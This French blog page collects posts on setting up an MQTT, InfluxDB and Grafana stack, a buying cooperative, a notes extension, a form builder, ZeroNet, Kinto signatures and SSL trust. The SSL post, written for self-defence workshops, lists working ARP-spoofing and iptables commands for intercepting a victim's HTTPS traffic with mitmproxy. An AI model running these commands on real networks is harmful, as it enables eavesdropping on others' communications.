Installation de Mosquitto, InfluxDB, Telegraf et Grafana

2022-08-29T00:00:00+02:00

Récemment, on a m’a demandé un petit coup de main pour aider à l’installation d’une pile logicielle qui permet de stocker des données temporelles et en faire des graphiques.

Voici donc quelques notes prises durant l’installation du système, concues pour que des personnes qui n’y connaissent pas grand chose puissent s’y retrouver.

L’objectif, c’est d’avoir des cartes Arduino qui envoient des données de manière régulière sur un système qui va nous permettre de les stocker et d’en faire des graphiques.

Pour ça, nous allons utiliser :

Un Broker Mosquitto qui va permettre de receptionner les données depuis les différents clients, puis de les dispatcher à qui en a besoin ;
Une base de données InfluxDB, qui permet de stocker des données temporelles ;
Un agent Telegraf qui va prendre les données du broker et les stocker dans la base de données InfluxDB.
Grafana, une application web qui permet de visualiser les données stockées dans InfluxDB.

Voici donc un document qui résume les étapes que j’ai suivies pour mettre en place les différents élements utiles :

Installer et se connecter au serveur

Dans notre cas, on est passé par un VPS chez OVH, qui tourne sous Debian 11, qui a le mérite d’être une distribution Linux stable, reconnue et (relativement) simple à utiliser.

Dans un terminal, vous pouvez vous connecter en utilisant la ligne de commande suivante :

Les lignes suivantes sont des lignes d’invite de commande, on les rencontre assez souvent dans les documentations sur le web. Le signe $ signifie le début de la ligne de commande. Le signe # signifie le début des commentaires.

$ ssh utilisateur@adresseip

Une fois connecté, on va mettre à jour les logiciels qui sont présents sur le serveur.

$ sudo apt update # mise à jour des dépôts (la liste des logiciels).
$ sudo apt upgrade # mise à jour des logiciels.

Configurer les DNS

Nous allons avoir besoin de deux sous domaines qui redirigent vers le serveur. Bien sur, il faut adapter ndd.tld et le remplacer par votre nom de domaine :

moquitto.ndd.tld
graphs.ndd.tld

Pour faire ça, chez OVH ça se passe dans la console de « OVH Cloud », direction « Noms de domaines », et puis il faut rajouter deux enregistrements de type « A » qui pointent vers l’adresse IP du serveur.

En temps normal, l’adresse IP vous est fournie par OVH. Si vous avez un doute, vous pouvez l’obtenir depuis le serveur avec la commande ip a.

Installer Mosquitto

$ sudo apt install mosquitto # installation depuis les dépots officiels

Une fois installé, il faut sécuriser l’installation avec un utilisateur et un mot de passe.

$ sudo mosquitto_passwd -c /etc/mosquitto/passwd <username>

Ensuite dans le fichier de configuration il faut spécifier où est le fichier qui contient les mots de passe. Pour éditer je recommande l’utilisation de l’éditeur de texte nano.

$ sudo nano /etc/mosquitto/mosquitto.conf

Voici les lignes à rajouter :

listener 1883
password_file /etc/mosquitto/passwd

Puis il faut relancer le service mosquitto :

$ sudo systemctl restart mosquitto

Avant de pouvoir utiliser mosquitto, il faut régler le firewall de chez OVH pour qu’il accepte de laisser passer les messages pour le broker MQTT.

Il faut ajouter une règle dans le Firewall qui laisse passer toutes les connections TCP, avec l’option « établie ».

Vérifions que tout fonctionne comme prévu :

Dans une console, écoutons…

$ mosquitto_sub -h mosquitto.ndd.tld -p 1883 -u <username> -P <password> -t topic

Et dans une autre envoyons un message :

$ mosquitto_pub -h mosquitto.ndd.tld -p 1883 -u <username> -P <password> -t topic -m 30

Vous deviez voir « 30 » apparaitre dans la première console. Si c’est bon, tout fonctionne !

Installation d’InfluxDB et Telegraf

Coup de bol, InfluxDB propose directement des packets pour Debian, sur leur dépot, qu’il faut donc ajouter en suivant ces quelques lignes :

sudo apt install -y gnupg2 curl wget
wget -qO- https://repos.influxdata.com/influxdb.key | sudo apt-key add -
echo "deb https://repos.influxdata.com/debian $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/influxdb.list
sudo apt update

Puis sudo apt install influxdb telegraf pour l’installer.

Ensuite, vous pouvez le lancer maintenant et indiquer au système de le lancer tout seul au démarrage :

$ sudo systemctl enable --now influxdb
$ sudo systemctl enable --now telegraf

Configuration de Telegraf

Telegraf permet de faire le lien entre les messages envoyés sur le broker MQTT et la base de données InfluxDB.

Ici, il faut rentrer un peu plus dans le vif du sujet, et ça dépends des messages que vous avez à stocker.

Dans notre cas, nous avons trois types de messages :

/BatVoltage, int
/Temperature, int
/GPS, string

Voici un fichier de configuration, qui reste à modifier en fonction des données.

[global_tags]
[agent]
  interval = "10s"
  round_interval = true
  metric_batch_size = 1000
  metric_buffer_limit = 10000
  collection_jitter = "0s"
  flush_interval = "10s"
  flush_jitter = "0s"
  precision = "0s"
  hostname = ""
  omit_hostname = false

[[outputs.influxdb]]
  urls = ["http://127.0.0.1:8086"]
  database = "telegraf"

[[inputs.mqtt_consumer]]
    servers = ["tcp://127.0.0.1:1883"]
    name_override = "mqtt_consumer_float"
    topics = [
     "Topic/BatVoltage",
     "Topic/Temperature",
    ]
    username = "<username>"
    password = "<password>"
    data_format = "value"
    data_type = "integer"

Installation de Grafana

sudo apt-get install -y apt-transport-https
sudo apt-get install -y software-properties-common wget
sudo wget -q -O /usr/share/keyrings/grafana.key https://packages.grafana.com/gpg.key
echo "deb [signed-by=/usr/share/keyrings/grafana.key] https://packages.grafana.com/oss/deb stable main" | sudo tee -a /etc/apt/sources.list.d/grafana.list
sudo apt update
sudo apt-get install grafana
sudo /bin/systemctl daemon-reload
sudo /bin/systemctl enable grafana-server
sudo /bin/systemctl start grafana-server

Nginx

sudo apt install nginx certbot python3-certbot-nginx

Puis il faut créer un fichier de configuration dans /etc/nginx/sites-enabled/graphs.ndd.tld avec le contenu suivant :

map $http_upgrade $connection_upgrade {
  default upgrade;
  '' close;
}

upstream grafana {
  server localhost:3000;
}

server {
  listen 80;
  server_name graphs.ndd.tld;
  root /usr/share/nginx/html;
  index index.html index.htm;

  location / {
    proxy_set_header Host $http_host;
    proxy_pass http://grafana;
  }

  # Proxy Grafana Live WebSocket connections.
  location /api/live/ {
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection $connection_upgrade;
    proxy_set_header Host $http_host;
    proxy_pass http://grafana;
  }
}

Une fois ces fichiers de configuration en place, il faut penser à la mise en place du SSL qui permet d’avoir une connexion sécurisée (https).

Il suffit de lancer cette ligne de commande et de suivre les questions posées :

sudo certbot --nginx

Voilà ! A ce moment là, tout doit être fonctionnel, il ne reste plus qu’à configurer le Grafana pour grapher les données enregistrées dans InfluxDB.

Groupement d’achats & partage d’expérience

2018-03-03T00:00:00+01:00

Il y a quelques années, on s’est motivé entre copains copines pour créer un groupement d’achat.

L’idée est simple:

commander en gros, pour faire baisser les prix
se passer d’intermédiaires et favoriser les circuits courts
aller à la rencontre des producteurs locaux et échanger

Notre groupement dessert actuellement 18 foyers et une 60aine de personnes.

Au fur et à mesure de la vie du groupement, on a développé quelques outils pour se simplifier la vie. Voici un retour d’expérience et quelques astuces / outils, au cas où l’envie vous prenne à vous aussi :)

Organisation

On organise environs trois ou quatre distributions par an. Le modus operandi est le suivant:

chaque product·eur·rice à un·e référent·e, qui s’occupe de faire le lien;
une personne est désignée pour coordonner la distribution;
4 semaines avant la distribution, les référent·e·s mettent à jour les prix / produits dans le tableau de commandes;·e·
3 semaines avant la distribution, les commandes sont ouvertes;
2 semaines avant la distribution, les commandes sont closes;
Les référent·e·s ont ensuite deux semaines pour récupérer les commandes pour la distribution

Quels produits ?

On essaye d’avoir uniquement des produits qui se conservent (on a également quelques autres produits plus frais, mais avec d’autres modalités).

Entre autres: bières, légumes secs, conserves, jus, miel, pâtes, semoule, café, vinaigres, pommes de terre, oignons, huiles, farines.

On essaye de faire du local puis du bio au plus proche plutôt que de trouver nécessairement les prix les plus bas. C’est une discussion qui revient assez souvent, et donc un point à évoquer lors de la création pour avoir une posture claire sur le sujet (tout le monde n’est pas animé par la même éthique !).

Paiements

Pour les paiements, on utilise autant que possible des chèques. Chaque référent·e paye la·le product·rice·eur en son nom, et lui demande d’attendre la date de la distribution pour l’encaissement. La plupart des producteurs acceptent d’être payés sous quinzaine.

Le jour de la distribution, tout le monde apporte son chéquier. Nous avons mis en place une moulinette qui s’occupe de faire la répartition des chèques automatiquement, chaque membre se retrouve à faire en moyenne un ou deux chèques.

Chaque référent·e est ainsi remboursé·e de la somme avancée, et chaque membre du groupement d’achat paye ce qu’il doit payer. Nous n’avons volontairement pas de structure juridique et pas de compte en banque. Les paiements s’effectuent directement entre nous.

Transports

Chaque référent·e commande les produits, puis ensuite s’occupe de les rapatrier. À Rennes, on a la chance d’avoir pas mal de producteurs aux alentours, donc c’est assez simple.

Le mieux est de ramener les produits juste un peu avant la distribution au lieu de distribution, ça permet d’éviter de les stocker trop longtemps, et d’éviter aux producteurs d’attendre trop longtemps avant d’encaisser les chèques.

Pour les grosses commandes, les voitures se remplissent bien, mais ma petite Clio suffit, que ce soit dit !

La distribution

Un peu en amont de la distribution, il faut organiser l’espace. Des tas par membre sont constitués pour faciliter les choses le jour de la distribution.

Le jour même, on se retrouve, on charge ses marchandises, on échange quelques chèques et on papote ! On en profite pour:

discuter de la date de la prochaine distribution;
trouver une nouvelle personne pour la coordonner;
discuter de nouveaux produits;
refaire le monde;
changer de référents pour les producteurs.

Et c’est reparti pour un tour ;)

Nos outils

On utilise un tableur en ligne pour partager les prix et prendre les commandes. On a essayé d’utiliser ethercalc au début mais ça ne fonctionnait pas pour nous à l’époque (trop de petits bugs). On a donc préféré utiliser Google docs (ouch).

Il est d’ailleurs possible d’y intégrer de nouvelles fonctionnalités assez facilement, du coup Fred et Rémy ont planché sur un moyen d’automatiser la répartition des chèques (qu’on faisait dans un premier temps à la main - assez péniblement).

Le système n’est pas parfait mais fonctionne quand même assez bien !

Quelques ressources, donc:

le code pour faire la répartition des chèques
une version « à remplir » de notre tableau de commandes (le mieux est d’en faire une copie !).

Bon groupement d’achat ;)

Webnotes

2018-02-25T00:00:00+01:00

Quand je navigue en ligne, j’aime bien prendre des notes sur ce que je lis. C’est utile pour les retrouver plus tard. Il existe quelques outils pour ce genre de cas, mais j’ai vraiment eu du mal à trouver un outil qui faisais ce que je voulais, de la manière que je voulais, c’est à dire:

enregistrer une sélection de texte ainsi que son contexte: heure, site web.
fonctionner sur Firefox;
stocker mes notes à un endroit que je contrôle (ce sont mes données, après tout !)
rester en dehors de mon chemin: je suis en train de lire, pas en train d’organiser mes notes.
automatiquement partager les notes sur une page web.

J’ai donc pris un peu de temps pour fabriquer mon outil de prises de notes, que j’ai baptisé « Webnotes ». C’est une extension Firefox, qui se configure assez simplement, et qui stocke les données dans une instance de Kinto.

C’est aussi simple que sélectionner du texte, faire « clic droit » puis « save as webnote », entrer un tag et le tour est joué !

Mes notes sont disponibles sur notes.notmyidea.org, et voici le lien vers les sources, si ça vous intéresse de regarder comment ça fonctionne !

Comment est-ce que vous générez vos formulaires ?

2016-05-31T00:00:00+02:00

TL; DR: Je viens à peine de releaser la première version d’un service de génération de formulaires. Allez jeter un coup d’œil sur https://www.fourmilieres.net

En février 2012, je parlais ici d’un service de génération de formulaires. Depuis, pas mal d’eau à coulé sous les ponts, on est passé par pas mal d’étapes pour finalement arriver à une première version de ce service de génération de formulaires (à la google forms).

En tant qu’organisateurs d’évènements (petits et gros), je me retrouve souvent dans une situation ou je dois créer des formulaires pour recueillir des informations. Actuellement, la meilleure solution disponible est Google Forms, mais celle ci à plusieurs problèmes, à commencer par le fait que le code n’est pas libre et que les données sont stockées chez Google.

La plupart du temps, le besoin est assez simple: je veux spécifier quelques questions, et donner un lien à mes amis pour qu’ils puissent y répondre. Je reviens ensuite plus tard pour voir la liste des réponses apportées.

Fonctionnalités

Il existe pas mal de solutions techniques qui essayent de répondre à la même problématique, mais la plupart d’entre elles sont assez souvent compliquées, nécessitent de se créer un compte, et/ou ne vous laisse pas la main libre sur les données générées, voire le code est assez difficile à faire évoluer ou à déployer.

Je voulais donc quelque chose de simple à utiliser et pour les créateurs de formulaires et pour les utilisateurs finaux. Pas de chichis, juste quelques vues, et des URLs à sauvegarder une fois l’opération terminée.

Pas de compte

Vous n’avez pas besoin d’avoir un compte sur le site pour commencer à l’utiliser. Vous créez simplement un nouveau formulaire puis envoyez le lien à vos amis pour qu’eux puissent à leur tour le remplir.

Gardez la main sur vos données

Une fois que vous avez récupéré les réponses à vos questions, vous pouvez récupérer les données sur votre machines dans un fichier .csv.

API

L’ensemble des données sont en fait stockées dans Kinto qui est interrogeable très facilement en HTTP. Ce qui fait qu’il est très facile de réutiliser les formulaires que vous avez construits (ou leurs réponses) depuis d’autres outils.

Auto-hébergeable

Un des objectifs de ce projet est de vous redonner la main sur vos données. Bien sur, vous pouvez utiliser l’instance qui est mise à votre disposition sur wwww.fourmilieres.net, mais vous pouvez également l’héberger vous même très simplement, et vous êtes d’ailleurs fortement encouragés à le faire ! Notre objectif n’est pas de stocker l’ensemble des formulaires du monde, mais de (re)donner le contrôle aux utilisateurs !

On commence petit…

Cette release n’est (bien sur) pas parfaite, et il reste encore pas mal de travail sur cet outil, mais je pense qu’il s’agit d’une base de travail intéressante pour un futur où Google n’a pas la main sur toutes nos données.

La liste des champs supportés est pour l’instant assez faible (Texte court, Texte long, Oui/Non, choix dans une liste) mais elle à vocation à s’étendre, en fonction des besoins de chacun.

J’ai d’ailleurs créé un formulaire pour que vous puissiez me faire part de vos retours, n’hésitez pas !

Et, euh, comment ça marche ?

Le formbuilder, comme j’aime l’appeler se compose en fin de compte de deux parties distinctes:

Kinto, un service qui stocke des données coté serveur et qui les expose via des APIs HTTP
Le formbuilder, une application JavaScript qui ne tourne que coté client (dans votre navigateur) qui permet de construire les formulaires et d’envoyer les données sur les APIs coté serveur.

Au niveau de la stack technique, le formbuilder est codé en ReactJS. Un des points techniques intéressants du projet est qu’il génère en fin de compte du JSON Schema, un format de validation de données JSON.

Donc, reprenons! Vous arrivez sur la page d’accueil puis cliquez sur “Create a new form”, puis vous vous retrouvez face à une interface ou vous pouvez ajouter des champs de formulaire. Une fois ce travail effectué, vous appuyez sur “Create the form”.

Le JSON Schema est alors envoyé au serveur Kinto, qui l’utilisera pour valider les données qu’il recevra par la suite.
Ce JSON Schema sera aussi utilisé lors de l’affichage du formulaire aux personnes qui le remplissent.
Un jeton d’accès est généré et ajouté à l’URL, il s’agit de l’identifiant du formulaire.
Un second jeton d’accès administrateur et généré, il vous faut le garder de coté pour avoir accès aux réponses.

Bref, en espérant que ça vous serve ! Un petit pas dans la direction des données rendues à leurs utilisateurs !

Avez vous confiance en SSL?

2016-03-25T00:00:00+01:00

Dans le cadre des ateliers d’autodéfense numérique, j’ai passé un peu de temps à creuser sur l’utilisation de SSL puisque contrairement à ce que la plupart des personnes ont encore tendance à croire, le petit cadenas (qui prouve qu’une connexion SSL est en cours) n’est absolument pas suffisant.

Allez hop, c’est parti pour:

un tour d’horizon du fonctionnement de SSl
quelques moyens contourner cette “protection” en faisant une attaque en pratique
un tour des solutions existantes actuellement et de pourquoi je ne les trouve pas vraiment satisfaisantes.

Comment fonctionne SSL?

Pour expliquer les problèmes de SSL, j’ai d’abord besoin d’expliquer comment tout ça fonctionne.

SSL repose sur l’utilisation de certificats, qui sont générés par des autorités de certification (Certificate Authority que je nomme CA dans la suite de l’article).

Les certificats SSL permettent deux choses:

De garantir que les communications entre les navigateurs (vous) et les sites Web ne sont connues que du détenteur du certificat du site et de vous même.
De garantir que le site sur lequel vous vous connectez est bien celui que vous imaginez.

Le navigateur, lors d’une visite d’un site, va télécharger le certificat associé puis vérifier que le certificat en question a bien été généré par un des CA en qui il a confiance.

Imaginons maintenant qu’une des CA essaye de savoir ce qui s’échange entre mon navigateur et le site de ma banque (protégé par SSL). Comment cela se passerait il ?

N’importe quel CA peut donc générer des certificats pour n’importe quel site, et le navigateur vérifierait, lui, que le certificat a bien été généré par une CA.

Tout cela ne poserait pas de soucis si les CA étaient gérés de manière fiable, mais il s’agit d’un travail compliqué, et certains CA ont par le passé montré des faiblesses.

Par exemple, DigiNotar (un CA des Pays-Bas) a été compromise et les attaquant.e.s ont pu générer des certificats SSL frauduleux, ce qui leur a permis d’attaquer des sites tels que Facebook ou GMail.

Vous pouvez retrouver une liste des risques et menaces autour des CA sur le wiki de CACert.

Attaque de l’homme du milieu avec SSL

A force de dire que c’était très facile à faire, j’ai eu envie d’essayer d’espionner des connections protégées par SSL, et effectivement c’est carrément flippant tellement c’est simple.

En l’espace de quelques minutes, il est possible de faire une attaque de l’homme du milieu en utilisant par exemple un outil nommé mitm-proxy.

Pour déchiffrer l’ensemble du trafic SSL, j’ai simplement eu à lancer quelques commandes et avoir un CA dans lequel le navigateur de la victime a confiance. Je l’ai ajouté dans le navigateur cible pour simuler que je l’avais déjà (c’est le cas si un des 1200 CA se fait pirater, ce qui me semble une surface d’attaque assez large).

Je les colle ici si ça vous intéresse:

$ sudo aptitude install mitmproxy
$ mitm-proxy -T --host

Il faut faire croire à votre victime que vous êtes la passerelle vers l’extérieur et à la passerelle que vous êtes la victime:

arpspoof -i wlan0 -t victime gateway
arpspoof -i wlan0 -t gateway victime

Puis dire à notre fausse passerelle de rediriger le trafic des ports 80 et 443 vers notre proxy:

sudo sysctl -w net.ipv4.ip_forward=1
sudo iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 443 -j REDIRECT --to-port 4443
sudo iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 4443

Et paf, on voit tout ce qui passe entre la machine et le serveur SSL. On peut d’ailleurs même imaginer faire tourner ces quelques commandes sur un raspberry pi, pour aller encore plus vite…

Key-pinning dans les navigateurs

Actuellement, n’importe quel CA peut générer des certificats pour n’importe quel site, et c’est en grande partie ce qui pose souci. Une des manières de faire évoluer la situation est d’épingler les certificats de certains sites directement dans les navigateurs.

Cette approche a le mérite de fonctionner très bien pour un petit nombre de sites critiques (Google, Facebook, etc).

HTTP Public Key Pinning (HPKP)

HTTP Public Key Pinning est également une solution de pinning qui permet d’établir une confiance lors de la première connexion avec le site. C’est ce qu’on appelle du Trust on First Use ou TOFU.

Le navigateur va alors mettre ces informations dans un cache et vérifiera que les certificats correspondent bien lors des prochaines visites.

HPKP est disponible dans Firefox depuis Janvier 2015 et dans Chrome depuis Octobre 2015.

Certificate transparency: des journaux auditables

Une autre approche est celle proposée par certificate transparency:

Certificate Transparency aims to remedy these certificate-based threats by making the issuance and existence of SSL certificates open to scrutiny by domain owners, CAs, and domain users.

— Certificate Transparency

Autrement dit, avec ce système les CA doivent rendre public le fait qu’ils aient signé de nouveaux certificats intermédiaires. La signature est ajoutée à un journal sur lequel il n’est possible que d’écrire.

Les navigateurs vont alors vérifier que les certificats utilisés sont bien des certificats qui ont été ajoutés au journal.

Ici, toute l’intelligence est dans la vérification de ces journaux, qui permettent donc de valider/invalider des certificats racines ou intermédiaires.

Il me semble donc qu’il serait possible d’ajouter un certificat frauduleux le temps d’une attaque (et celui ci serait détecté et supprimé ensuite).

Certificate-Transparency n’est donc pas une solution contre une écoute globale mise en place par les gouvernements par exemple.

Si vous lisez bien l’anglais, je vous invite à aller lire cette description du problème et de la solution que je trouve très bien écrite.

DANE + DNSSEC

The DANE working group has developed a framework for securely retrieving keying information from the DNS [RFC6698]. This framework allows secure storing and looking up server public key information in the DNS. This provides a binding between a domain name providing a particular service and the key that can be used to establish encrypted connection to that service.

— Dane WG

Une autre solution est appelée “DANE” et repose par dessus le protocole DNSSEC.

Je connais assez mal DNSSEC donc j’ai passé un peu de temps à lire des documents. L’impression finale que ça me laisse est que le problème est exactement le même que pour SSL: un certain nombre de personnes détiennent les clés et toute la sécurité repose sur cette confiance. Or il est possible que ces clés soient détenues par des personnes non dignes de confiance.

Secure DNS (DNSSEC) uses cryptographic digital signatures signed with a trusted public key certificate to determine the authenticity of data. — https://en.wikipedia.org/wiki/DNS_spoofing

Et aussi:

It is widely believed[1] that securing the DNS is critically important for securing the Internet as a whole, but deployment of DNSSEC specifically has been hampered (As of 22 January 2010) by several difficulties:

The need to design a backward-compatible standard that can scale to the size of the Internet

Prevention of “zone enumeration” (see below) where desired

Deployment of DNSSEC implementations across a wide variety of DNS servers and resolvers (clients)

Disagreement among implementers over who should own the top-level domain root keys Overcoming the perceived complexity of DNSSEC and DNSSEC deployment

Solutions basées sur la blockchain

Une dernière piste semble être l’utilisation de la blockchain pour distribuer des clés par site.

La solution DNSChain me paraissait tout d’abord un bon point de départ mais la lecture de quelques critiques et interventions du développeur du projet m’ont fait changer d’avis.

Reste encore la piste de Namecoin Control que je n’ai pas encore creusée. Peut-être pour un prochain billet. Toute piste de réflexion est bien sur la bienvenue sur ces sujets!

Retours sur un atelier ZeroNet

2016-03-17T00:00:00+01:00

Mardi dernier se tenait une cryptoparty dans les locaux de l’INSA de Rennes.

L’évènement s’étant rempli au delà de toutes les espérances, on m’a proposé de venir y tenir un atelier, que j’ai proposé sur ZeroNet, un petit projet fort sympathique qui pourrait devenir une nouvelle manière de distribuer le Web, permettant notamment d’éviter la censure.

Avant toute autre chose, merci énormément à l’équipe de la bibliothèque de l’INSA pour l’organisation de cet évènement qui à une réelle portée politique.

Un peu d’histoire

Il me semble que Tim Bernes Lee (l’inventeur du Web) avait prévu le Web comme un protocole décentralisé. Chacun hébergerait ses données et les servirait aux autres, qui pourraient alors y accéder.

Avec ce fonctionnement, impossible alors d’accéder à des sites si leur auteur n’est pas en ligne. Qu’à cela ne tienne, on s’est mis à avoir des machines qui restent connectées au réseau 24 heures par jour. Et puis une machine ne suffisant plus, on a eu des fermes de machines dans des data centers etc afin de supporter les milliers d’utilisateurs des sites.

Un Web décentralisé

ZeroNet permet (entre autres) de répondre à ce problème en proposant une manière alternative de distribuer le Web, en pair à pair. Lors d’une visite d’un site:

Vous contactez un tracker BitTorrent pour connaitre la liste des autres visiteurs du site (les pairs).
Vous demandez aux pairs de vous donner les fichiers du site.
Vous validez que les fichiers servis sont bien les bons (en vérifiant la signature attachée).

N’importe quel visiteur devient alors un pair, qui sert le site aux autres visiteurs.

Parmi les nombreux avantages de cette approche, je note particulièrement que:

Il est très difficile de censurer un site — Il est sur l’ensemble des machines des visiteurs.
Les attaques par fingerprinting sont impossibles: le navigateur Web se connecte à un serveur proxy local.
Vous détenez directement vos données et (par design) ne les donnez pas à des silos (Facebook, Google, etc.)

Si vous êtes interessés par une démonstration rapide, j’ai enregistré une vidéo de 10 minutes où je parle en anglais avec une voix très grave.

Atelier

Pour l’atelier, j’ai choisi de faire une présentation rapide du projet (j’ai traduit les slides anglais pour l’occasion — accès aux sources) avant d’installer ZeroNet sur les machines et de l’utiliser pour publier un site.

Partager sur le réseau local

Nous avons eu des soucis à cause du réseau (un peu congestionné) sur lequel les ports utilisés pour la discussion entre pairs étaient fermés. Il est bien sur possible de faire tourner le tout de manière indépendante du reste du réseau, mais je n’avais pas prévu le coup.

Voici donc comment faire pour contourner le souci:

Installer et lancer un tracker BitTorrent (De manière surprenante, rien n’est packagé pour debian pour l’instant) J’ai choisi d’installer OpenTracker
Ensuite lancer ZeroNet avec des options spécifiques.

$ python zeronet.py --trackers udp://localhost:6969 --ip_external 192.168.43.207
$ python zeronet.py --trackers udp://192.168.43.207:6969 --ip_external 192.168.43.172

Il est nécessaire de spécifier l’adresse IP externe que chaque nœud expose pour éviter qu’elle n’essaye d’aller la trouver par elle même: nous voulons l’adresse du réseau local, et non pas l’adresse internet.

La prochaine fois je tenterais de venir avec un HotSpot Wifi et un tracker BitTorrent dans la poche!

Questions / Réponses

Il y avait quelques questions intéressantes auxquelles je n’ai pas toujours su répondre sur le moment. Après quelques recherches, je rajoute des détails ici.

Torrent + Tor = brèche de sécu ?

Il me semblait avoir entendu parler de problèmes de dé-anonymisation lors de l’utilisation de BitTorrent par dessus Tor.

Dans certains cas, certains clients torrents (uTorrent, BitSpirit, etc) écrivent directement votre adresse IP dans l’information qui est envoyée au tracker et/ou aux autres pairs. — https://blog.torproject.org/blog/bittorrent-over-tor-isnt-good-idea

Ce n’est pas le cas de ZeroNet, ce qui évacue le souci.

ZeroMail, c’est lent non ?

Une des applications de démo, ZeroMail, propose un mécanisme qui permet de s’envoyer des messages chiffrés sur un réseau pair à pair. L’approche choisie est de chiffrer les messages avec la clé du destinataire et de le mettre dans un pot commun. Tout le monde essaye de déchiffrer tous les messages, mais ne peut déchiffrer que les siens.

Cela permet de ne pas fuiter de méta-données, à l’inverse de PGP.

Je n’ai en fait pas de réponse claire à donner à cette question: l’auteur de ZeroNet me disait que 10MB (la limite de taille d’un site, par défaut) correspondait à beaucoup de place pour stocker des messages, et qu’il était possible de supprimer les anciens messages une fois qu’ils sont lus par exemple.

Une autre solution à laquelle je pensait était de créer un ZeroSite pour chaque récipient, mais on connait à ce moment là le nombre de messages qu’un utilisateur peut recevoir.

Je vois plusieurs problèmes avec le design actuel de ZeroMail (il me semble assez facile d’y faire un déni de service par exemple). A creuser.

Comment héberger des très gros sites ?

Par exemple, comment faire pour héberger Wikipedia ?

Il semble que la meilleure manière de faire serait de séparer Wikipedia en un tas de petites ressources (par catégorie par ex.). Les gros médias pourraient être considérés optionnels (et donc téléchargés uniquement à la demande)

Est-ce qu’on à vraiment besoin d’un tracker ?

Le support d’une DHT est souhaité, mais pour l’instant pas encore implémenté. L’utilisation de la DHT BitTorrent n’est pas une option puisque Tor ne supporte pas UDP.

Service de nuages : Garantir l’intégrité des données via des signatures

2016-03-01T00:00:00+01:00

Cet article est repris depuis le blog « Service de Nuages » de mon équipe à Mozilla

Dans le cadre du projet Go Faster, nous souhaitons distribuer des mises à jour de parties de Firefox de manière séparée des mises à jour majeures (qui ont lieu toutes les 6 semaines).

Les données que nous souhaitons mettre à jour sur les clients sont multiples. Entre autres, nous souhaitons gérer la mise à jour des listes de révocation (CRL) de certificats SSL.

Il est évidemment nécessaire de s’assurer que les données qui sont téléchargées sur les client sont légitimes : que personne ne tente d’invalider des certificats alors qu’ils sont valides, et que l’ensemble des mises à jour sont bel et bien récupérées sur le client.

La signature garantit qu’une mise à jour contient tous les enregistrements, mais il est toujours possible de bloquer l’accès au service (par exemple avec le china great firewall).

Ce mécanisme fonctionne pour les listes de certificats à révoquer, mais pas uniquement. Nous comptons réutiliser ce même fonctionnement dans le futur pour la mise à jour d’autres parties de Firefox, et vous pouvez également en tirer parti pour d’autres cas d’utilisation.

Nous souhaitons utiliser Kinto afin de distribuer ces jeux de données. Un des avantages est que l’on peut facilement cacher les collections derrière un CDN.

Par contre, nous ne souhaitons pas que les clients fassent confiance aveuglément, ni au serveur Kinto, ni au CDN.

Effectivement, un attaquant, contrôlant l’un ou l’autre, pourrait alors envoyer les mises à jour qu’il souhaite à l’ensemble des clients ou supprimer des certificats révoqués. Imaginez le carnage !

Afin de résoudre ce problème, considérons les conditions suivantes:

La personne qui a le pouvoir de mettre à jour les CRL (l’updater) a accès à une cle de signature (ou mieux, un HSM) qui lui permet de signer la collection;
Le pendant public de ce certificat est stocké et distribué dans Firefox;
Le hashing et la signature sont faits côté client pour éviter certains vecteurs d’attaque (si un attaquant a la main sur le serveur Kinto par exemple).

Le chiffrement à sens unique, aussi appellé hashing est un moyen de toujours obtenir le même résultat à partir de la même entrée.

Premier envoi de données sur Kinto

L’ensemble des données est récupéré depuis une source sécurisée puis mis dans une collection JSON. Chaque élément contient un identifiant unique généré sur le client.

Par exemple, un enregistrement peut ressembler à :

{"id": "b7dded96-8df0-8af8-449a-8bc47f71b4c4",
 "fingerprint": "11:D5:D2:0A:9A:F8:D9:FC:23:6E:5C:5C:30:EC:AF:68:F5:68:FB:A3"}

Le hash de la collection est ensuite calculé, signé puis envoyé au serveur (voir plus bas pour les détails).

La signature est déportée sur un service qui ne s’occupe que de ça, puisque la sécurité du certificat qui s’occupe des signatures est extrêmement importante.

Comment vérifier l’intégrité des données ?

Premièrement, il faut récupérer l’ensemble des enregistrements présents sur le serveur, ainsi que le hash et la signature associée.

Ensuite, vérifier la signature du hash, pour s’assurer que celui-ci provient bien d’un tiers de confiance.

Finalement, recalculer le hash localement et valider qu’il correspond bien à celui qui a été signé.

Ajouter de nouvelles données

Pour l’ajout de nouvelles données, il est nécessaire de s’assurer que les données que l’on a localement sont valides avant de faire quoi que ce soit d’autre.

Une fois ces données validées, il suffit de procéder comme la première fois, et d’envoyer à nouveau le hash de la collection au serveur.

Comment calculer ce hash ?

Pour calculer le hash de la collection, il est nécessaire :

D’ordonner l’ensemble des éléments de la collection (par leur id) ;
Pour chaque élément, sérialiser les champs qui nous intéressent (les concaténer clé + valeur)
Calculer le hash depuis la sérialisation.

Nous sommes encore incertains de la manière dont le hash va être calculé. Les JSON Web Signature semblent une piste intéressante. En attendant, une implementation naïve en python pourrait ressembler à ceci :

import json
import hashlib

data = [
   {"id": "b7dded96-8df0-8af8-449a-8bc47f71b4c4",
    "fingerprint": "11:D5:D2:0A:9A:F8:D9:FC:23:6E:5C:5C:30:EC:AF:68:F5:68:FB:A3"},
   {"id": "dded96b7-8f0d-8f8a-49a4-7f771b4c4bc4",
    "fingerprint": "33:6E:5C:5C:30:EC:AF:68:F5:68:FB:A3:11:D5:D2:0A:9A:F8:D9:FC"}]

m = hashlib.sha256()
m.update(json.dumps(data, sort_keys=True))
collection_hash = m.hexdigest()

Let’s Encrypt + HAProxy

2016-02-11T00:00:00+01:00

Note : Cet article n’est plus à jour. Il est maintenant (2018) possible d’installer des certificats SSL Let’s Encrypt d’une manière beaucoup plus simple, en utilisant certbot (et le plugin nginx certbot --nginx).

It’s time for the Web to take a big step forward in terms of security and privacy. We want to see HTTPS become the default. Let’s Encrypt was built to enable that by making it as easy as possible to get and manage certificates.

— Let’s Encrypt

Depuis début Décembre, la nouvelle autorité de certification Let’s Encrypt est passée en version Beta. Les certificats SSL sont un moyen de 1. chiffrer la communication entre votre navigateur et le serveur et 2. un moyen d’être sur que le site Web auquel vous accédez est celui auquel vous pensez vous connecter (pour éviter des attaques de l’homme du milieu).

Jusqu’à maintenant, il était nécessaire de payer une entreprise pour faire en sorte d’avoir des certificats qui évitent d’avoir ce genre d’erreurs dans vos navigateurs:

